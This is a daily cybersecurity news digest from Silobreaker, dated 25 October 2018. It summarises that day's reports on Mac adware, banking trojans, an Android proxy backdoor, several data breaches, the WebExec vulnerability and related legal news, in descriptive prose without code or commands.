Silobreaker Daily Cyber Digest – 25 October 2018
New Mac malware found to intercept encrypted web traffic to display ads
- Malwarebytes researcher Adam Thomas discovered a new Mac malware named OSX[.]SearchAwesome.
- According to Thomas, OSX[.]SearchAwesome differs from other adware by installing a certificate that allows it to access https traffic and carry out man-in-the-middle (MitM) attacks. The malware was found to inject scripts from malicious websites into web pages loaded on the infected device.
- The researcher also warns that the injected script could potentially be used for many other purposes such as redirecting users to phishing websites, mining cryptocurrency or capturing browsing data and keylogging.
Malware targets Brazil using Windows components WMI and CertUtil
- The two legitimate files wmic.exe and certutil.exe were abused to download the malware’s payload onto the victim’s device. Despite being used before in malware campaigns, in this instance the attack incorporates both files, whilst also adding anti-evasion layers.
- The malware is distributed via a malicious email that notifies the target of an unsuccessful delivery attempt, prompting the victim to click on a link that will open a browser window, further prompting the user to download a ZIP file.
- Trend Micro assesses that the final payload is a banking malware that only functions when the victim’s language is set to Portuguese, suggesting it is likely that the campaign is targeting users in Portuguese-speaking countries such as Brazil.
Source (Includes IOCs)
McAfee discover a Timpdoor backdoor turning mobile devices into hidden proxies
- McAfee’s research team have discovered a phishing campaign using text messages that trick users into downloading a fake voice message app. The fake app delivers TimpDoor, which gives threat actors the ability to use infected devices as network proxies without the victim’s knowledge.
- After installation the malware, detected by McAfee as Android/TimpDoor, runs a background service starting a Socks proxy that ‘redirects network traffic from a third-party server via an encrypted connection through a secure shell tunnel’. The shell tunnel allows potential access to internal networks and bypasses network security mechanisms.
- Of the 26 malicious APK files discovered on the main distribution server, the earliest Timpdoor variant has been available since March 2018, and the apps have infected at least 5,000 devices in the United States.
South Korean researchers detect new cyber attack by the Lazarus Group
- Researchers from ESTsecurity discovered a new campaign attributed to the Lazarus Group, in which malicious files are disguised as government documents running on Hangeul, a Korean-language word processor.
- The researchers found that the malicious files contain the same metadata and functions that were used in Lazarus Group’s attacks on Sony Pictures.
ESET discover more banking trojans on official Google Play store
- 29 trojans discovered in the Google Play store were masquerading as device boosters and cleaners, battery managers and, in some cases, horoscope-themed apps.
- The trojans are capable of targeting apps found on the victim’s device with tailored phishing forms. In addition, they can also intercept and redirect text messages to bypass SMS- based two-factor-authentication, download and install apps onto the infected device, and intercept call logs.
- The apps have some code similarities and share a C&C server, despite being uploaded under different developer names. The malicious apps have now been removed from Google Play.
Leaks and Breaches
Surveillance company Wolf Intelligence exposes its own data
- Security researchers from CSIS Security discovered that Wolf Intelligence, a German startup offering surveillance and hacking technology to governments worldwide, exposed 20 GB of data through an unprotected C&C server and public Google Drive folder.
- The data includes recordings of meetings with customers, a passport scan and credit card scan belonging to the company’s founder and data collected from surveillance targets.
- Wolf Intelligence founder Manish Kumar claimed that an unidentified reseller was responsible for the leak and ‘plans to sue CSIS for hacking his reseller’, despite CSIS finding the data to be publicly accessible online.
Cathay Pacific data breach exposes 9.4 million customers’ data
- The data accessed includes names, birthdates, phone numbers, email addresses, passport numbers, ID card numbers, historical travel information, and more. 403 expired credit card numbers and 27 credit card numbers with no CVVs were also breached.
- The airline first detected suspicious activity on its systems in March 2018. The airline plans to notify all customers affected by the breach.
Pocket iNet accidently exposes sensitive data
- Researchers from Upguard found the data on a publicly available AWS S3 server, that didn’t require a password, belonging to Pocket iNet, a Washington State internet provider. The data was 73GB in size, and included passwords to servers, switches, routers and core firewalls, as well as spreadsheets, pictures and diagrams.
- It was first discovered on October 11th, 2018 and was secured a week later.
Remote Code Execution vulnerability discovered in Cisco WebEx
- Disclosed by Ron Bowes and Jeff McJunkin of Counter Hack, the remote code execution vulnerability CVE-2018-15442, known as WebExec, can allow an attacker to execute commands through a component of WebEx, even when it is not listening for remote connections.
- The bug has since been fixed in Cisco Webex productivity tools version 33.0.5 and later.
Guccifer to be extradited to US to serve 52-month prison sentence
- Guccifer was released from a Romanian prison and is now ready to be extradited to the US to serve 52 months in prison for hacking US government officials between 2012 and 2014.
Yahoo reaches settlement regarding historical security breach
- Yahoo reached a settlement in a lawsuit regarding the security breaches that occurred in 2013 and 2014, but were not reported until 2016. They will pay $50 million in damages, and provide two years of free-credit monitoring services to the 200 million individuals affected.
The Silobreaker Team
Disclaimer: Although Silobreaker has relied on what it regards as reliable sources while compiling the content herein, Silobreaker cannot guarantee the accuracy, completeness, integrity or quality of such content and no responsibility is accepted by Silobreaker in respect of such content. Readers must determine for themselves what reliance they should place on the compiled content herein.